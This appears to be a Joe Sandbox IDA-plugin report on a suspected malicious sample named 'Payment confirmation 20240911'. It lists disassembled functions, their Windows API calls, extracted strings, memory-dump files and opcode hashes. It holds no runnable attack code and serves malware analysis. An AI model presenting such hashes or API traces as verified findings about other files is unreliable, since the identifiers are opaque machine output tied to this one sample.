                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                          • API String ID: 3730832054-3931177956
                                          • Opcode ID: 57cc3324207e98f2eefc9f893ef8aaff1b947fd4c31517f95a0f8da7861b984b
                                          • Instruction ID: 4897781b355c16bcbf55aecc5c4670e2e44b662b8b2e25a56cac7f55a8c9e6b2
                                          • Opcode Fuzzy Hash: 57cc3324207e98f2eefc9f893ef8aaff1b947fd4c31517f95a0f8da7861b984b
                                          • Instruction Fuzzy Hash: F0C10671A0462ADBDB24EFA9D484779FBF8FF05718F048465E545AB988CB70EC40CBA1
                                          Function 01346F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 01346FF9
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01347044
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 20c82c2d9a5844467b9ed2f3cd1ed03c2dd5b8da4b8dc7fa2c0f483a53422622
                                          • Instruction ID: 332239f14c0eaac426426488b62244cfc98f4088569bf278b72c28ee10099347
                                          • Opcode Fuzzy Hash: 20c82c2d9a5844467b9ed2f3cd1ed03c2dd5b8da4b8dc7fa2c0f483a53422622
                                          • Instruction Fuzzy Hash: 029183342143029FCB18EF14C950A79B7E6FFA8258F44885DE9965B7A1DB31FD0ACB81
                                          Function 0134ECBC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 229windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • PostMessageW.USER32 ref: 0134ED0C
                                          • GetFocus.USER32(?,?,?,?), ref: 0134ED1C
                                          • GetDlgCtrlID.USER32 ref: 0134ED27
                                          • _memset.LIBCMT ref: 0134EE52
                                          • GetMenuItemInfoW.USER32 ref: 0134EE7D
                                          • GetMenuItemCount.USER32(00000000), ref: 0134EE9D
                                          • GetMenuItemID.USER32(?,00000000), ref: 0134EEB0
                                          • GetMenuItemInfoW.USER32 ref: 0134EEE4
                                          • GetMenuItemInfoW.USER32 ref: 0134EF2C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0134EF64
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0134EF99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0$`"u
                                          • API String ID: 1296962147-2270789441
                                          • Opcode ID: 06e23186a1faa1f893fad85d278fa59df6fea546f9eff1326b5b7129d7fa6f14
                                          • Instruction ID: 28a9fe1e6628172ae664a7ab0fa4878fa48d2995a6a03a4fdbe32cda393a0241
                                          • Opcode Fuzzy Hash: 06e23186a1faa1f893fad85d278fa59df6fea546f9eff1326b5b7129d7fa6f14
                                          • Instruction Fuzzy Hash: 6881B471208312AFD721DF18C884A6BBFE8FF88358F00492DFA9997291D774E945CB52
                                          Function 0134E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32 ref: 0134E3BB
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0134BCBF), ref: 0134E417
                                          • LoadImageW.USER32 ref: 0134E457
                                          • LoadImageW.USER32 ref: 0134E49C
                                          • LoadImageW.USER32 ref: 0134E4D3
                                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0134BCBF), ref: 0134E4DF
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0134E4EF
                                          • DestroyIcon.USER32(?,?,?,?,?,0134BCBF), ref: 0134E4FE
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0134E51B
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0134E527
                                            • Part of subcall function 01301BC7: __wcsicmp_l.LIBCMT ref: 01301C50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 1212759294-1154884017
                                          • Opcode ID: 2c5ebe906636347e04fa9515d744e5b7ef0512b7b3a13e53f7d935c5000cc1c6
                                          • Instruction ID: 07aadfc12deff1d50754c0b3b7659b44eba698b1d2207b479ca4c844eeb7c1f0
                                          • Opcode Fuzzy Hash: 2c5ebe906636347e04fa9515d744e5b7ef0512b7b3a13e53f7d935c5000cc1c6
                                          • Instruction Fuzzy Hash: D5619071600619BBEB25DF68CC45FBA7BECBB08718F108125F955E61D0DB78EA40C760
                                          Function 01330E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 01330EFF
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 01330F0F
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01330F1B
                                          • __wsplitpath.LIBCMT ref: 01330F79
                                          • _wcscat.LIBCMT ref: 01330F91
                                          • _wcscat.LIBCMT ref: 01330FA3
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 01330FB8
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01330FCC
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01330FFE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0133101F
                                          • _wcscpy.LIBCMT ref: 0133102B
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0133106A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                          • String ID: *.*
                                          • API String ID: 3566783562-438819550
                                          • Opcode ID: 47318a0f5c9ccd4c356cfeb36e4e037d5e9f04c9f947f59959a83d5d4512165e
                                          • Instruction ID: be6e812450bbe7325d7ff6786524350718c97be5cb62b6b89f91e62331f92e82
                                          • Opcode Fuzzy Hash: 47318a0f5c9ccd4c356cfeb36e4e037d5e9f04c9f947f59959a83d5d4512165e
                                          • Instruction Fuzzy Hash: 6E61A0B26143069FC710EF64C8449AFB7E8FF99314F04891EE989C7250EB31E905CB96
                                          Function 012FB86E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E49CA: InvalidateRect.USER32(?,00000000,00000001), ref: 012E4A23
                                          • DestroyWindow.USER32 ref: 012FB926
                                          • KillTimer.USER32 ref: 012FB9BD
                                          • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,012FB85B,00000000,?,?,012FAF1E,?,?), ref: 0135E775
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,012FB85B,00000000,?,?,012FAF1E,?,?), ref: 0135E7A6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,012FB85B,00000000,?,?,012FAF1E,?,?), ref: 0135E7BD
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,012FB85B,00000000,?,?,012FAF1E,?,?), ref: 0135E7D9
                                          • DeleteObject.GDI32(00000000), ref: 0135E7EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID: `"u
                                          • API String ID: 641708696-810275233
                                          • Opcode ID: a9b9d3293796cbf52ebc174d83a5e035c9892e46b6f18625cced404b72865e6e
                                          • Instruction ID: a57b7ec76e1c0c505d1b4ee63e2007978953a4acf10a94e20ab00084118e6320
                                          • Opcode Fuzzy Hash: a9b9d3293796cbf52ebc174d83a5e035c9892e46b6f18625cced404b72865e6e
                                          • Instruction Fuzzy Hash: A4619A35120712DFEB329F29D588B25FFF9FB45B16F44452DE68686A68C770A980CF40
                                          Function 0132DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • CharLowerBuffW.USER32(?,?), ref: 0132DB26
                                          • GetDriveTypeW.KERNEL32 ref: 0132DB73
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0132DBBB
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0132DBF2
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0132DC20
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: ab02e3cd17f3e762213b57f4ab308c8a50e3f88add2acc3974b88ded51b0de14
                                          • Instruction ID: 445a5835dcd6e98cc378486ef1d1a51ba1786ed5d852749f8b4cbabde5fb0761
                                          • Opcode Fuzzy Hash: ab02e3cd17f3e762213b57f4ab308c8a50e3f88add2acc3974b88ded51b0de14
                                          • Instruction Fuzzy Hash: 68517F755143169FCB00EF24C99486BB7F8FF98618F40886CE89697260EB31ED09CB81
                                          Function 012FB039 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 131COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          • GetSysColor.USER32(0000000F,?,?,?,?), ref: 012FB067
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID: `"u
                                          • API String ID: 259745315-810275233
                                          • Opcode ID: 22e8927a6afd0da73d793a4e412e29a01c621ab3ca5dd88fb36b26ee4b5570f2
                                          • Instruction ID: 22846be80d2d45744153bef27b5c3316aa145495d22af71120227bd512c70223
                                          • Opcode Fuzzy Hash: 22e8927a6afd0da73d793a4e412e29a01c621ab3ca5dd88fb36b26ee4b5570f2
                                          • Instruction Fuzzy Hash: 4241C431210104EFEB355F6CD848BB97B69AB06734F148279FFB58A1E6D7718941CB21
                                          Function 01323110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,01354085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 01323145
                                          • LoadStringW.USER32(00000000,?,01354085,00000016), ref: 0132314E
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,01354085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 01323170
                                          • LoadStringW.USER32(00000000,?,01354085,00000016), ref: 01323173
                                          • __swprintf.LIBCMT ref: 013231B3
                                          • __swprintf.LIBCMT ref: 013231C5
                                          • _wprintf.LIBCMT ref: 0132326C
                                          • MessageBoxW.USER32 ref: 01323283
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 984253442-2268648507
                                          • Opcode ID: 748e3a5bf915d68f94a270059fccfe7eae63ae68b93ab6757c137b0c7126c00c
                                          • Instruction ID: 2affb85bbfbeecaaaddd4123f7ea7fdf2a1458cf17a4b3c4a4f96c6ce1796e65
                                          • Opcode Fuzzy Hash: 748e3a5bf915d68f94a270059fccfe7eae63ae68b93ab6757c137b0c7126c00c
                                          • Instruction Fuzzy Hash: A841427191021ABACF14FBE5DD99EEFB7BCBF28605F900065E201B2190EB756E44CB61
                                          Function 0132D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0132D96C
                                          • __swprintf.LIBCMT ref: 0132D98E
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0132D9CB
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0132D9F0
                                          • _memset.LIBCMT ref: 0132DA0F
                                          • _wcsncpy.LIBCMT ref: 0132DA4B
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0132DA80
                                          • CloseHandle.KERNEL32(00000000), ref: 0132DA8B
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0132DA94
                                          • CloseHandle.KERNEL32(00000000), ref: 0132DA9E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 8551badfa305ffc2fd741edb1b260c4aea54fde7e3f6c48dba4b49c18176054f
                                          • Instruction ID: 0538ee03456ee630ff89591c44a0277d8b0a7a89cf4cceb0884ef35fcb92e2c2
                                          • Opcode Fuzzy Hash: 8551badfa305ffc2fd741edb1b260c4aea54fde7e3f6c48dba4b49c18176054f
                                          • Instruction Fuzzy Hash: 8A31C872600218AADB21EFE8DC48FDA77FCBF89714F0081A5F555D20A0E770D6408BA1
                                          Function 0134E541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0134E564
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0134BD04,?,?,00000000,?), ref: 0134E57B
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0134BD04,?,?,00000000,?), ref: 0134E586
                                          • CloseHandle.KERNEL32(00000000), ref: 0134E593
                                          • GlobalLock.KERNEL32(00000000), ref: 0134E59C
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0134E5AB
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0134E5B4
                                          • CloseHandle.KERNEL32(00000000), ref: 0134E5BB
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0134E5CC
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0136D9BC,?), ref: 0134E5E5
                                          • GlobalFree.KERNEL32(00000000), ref: 0134E5F5
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0134E619
                                          • CopyImage.USER32 ref: 0134E644
                                          • DeleteObject.GDI32(00000000), ref: 0134E66C
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0134E682
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 95a8ffb9f46fce0cc76dadcd4b15d77b777a3c02326ed37f9a81b5ed32caff0c
                                          • Instruction ID: da3d9ccfaee8de9e4fd1419b9846e503f7bc87ae0aac09e3a106f3e7f72a7a52
                                          • Opcode Fuzzy Hash: 95a8ffb9f46fce0cc76dadcd4b15d77b777a3c02326ed37f9a81b5ed32caff0c
                                          • Instruction Fuzzy Hash: 8E415B75600204FFDB219FA5DC48EAA7BBDFF89725F008068F946D7264D775A900DB60
                                          Function 01330B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                          Download Yara Rule
                                          APIs
                                          • __wsplitpath.LIBCMT ref: 01330C93
                                          • _wcscat.LIBCMT ref: 01330CAB
                                          • _wcscat.LIBCMT ref: 01330CBD
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 01330CD2
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01330CE6
                                          • GetFileAttributesW.KERNEL32(?), ref: 01330CFE
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 01330D18
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01330D2A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                          • String ID: *.*
                                          • API String ID: 34673085-438819550
                                          • Opcode ID: 32866a97b2fc34a3cf48be3a2628e71f7df2dee71c661882591bc63d5d3c8edc
                                          • Instruction ID: d2bac5032d1ca43684c33d07bc515b0f36068d1ac39fcd53d7d7dc15109e5b91
                                          • Opcode Fuzzy Hash: 32866a97b2fc34a3cf48be3a2628e71f7df2dee71c661882591bc63d5d3c8edc
                                          • Instruction Fuzzy Hash: 2C8196715043059FDB68DF68C8449AEB7E8BFC8318F14882EF985DB250E734D984CB96
                                          Function 01349A23 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 183windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01349AA5
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01349AA8
                                          • GetWindowLongW.USER32(?,000000F0), ref: 01349ACC
                                          • _memset.LIBCMT ref: 01349ADD
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01349AEF
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01349B67
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID: `"u
                                          • API String ID: 830647256-810275233
                                          • Opcode ID: 8722cd2acc48aeaeddef60bc4c313d7b8df0d03263e2527dc6e222cefd07d7d9
                                          • Instruction ID: 80be3f02cc855b898004e51c1a416e205f14605a2aeb6a6cd51d39f06bcb3e1e
                                          • Opcode Fuzzy Hash: 8722cd2acc48aeaeddef60bc4c313d7b8df0d03263e2527dc6e222cefd07d7d9
                                          • Instruction Fuzzy Hash: E9614A75A00248AFEB21DFA8CC80FEE7BF8EF09718F144159FA15A7291D770A945CB94
                                          Function 0131B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0131B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0131B903
                                            • Part of subcall function 0131B8E7: GetLastError.KERNEL32(?,0131B3CB,?,?,?), ref: 0131B90D
                                            • Part of subcall function 0131B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0131B3CB,?,?,?), ref: 0131B91C
                                            • Part of subcall function 0131B8E7: HeapAlloc.KERNEL32(00000000,?,0131B3CB,?,?,?), ref: 0131B923
                                            • Part of subcall function 0131B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0131B93A
                                            • Part of subcall function 0131B982: GetProcessHeap.KERNEL32(00000008,0131B3E1,00000000,00000000,?,0131B3E1,?), ref: 0131B98E
                                            • Part of subcall function 0131B982: HeapAlloc.KERNEL32(00000000,?,0131B3E1,?), ref: 0131B995
                                            • Part of subcall function 0131B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0131B3E1,?), ref: 0131B9A6
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0131B5F7
                                          • _memset.LIBCMT ref: 0131B60C
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0131B62B
                                          • GetLengthSid.ADVAPI32(?), ref: 0131B63C
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0131B679
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0131B695
                                          • GetLengthSid.ADVAPI32(?), ref: 0131B6B2
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0131B6C1
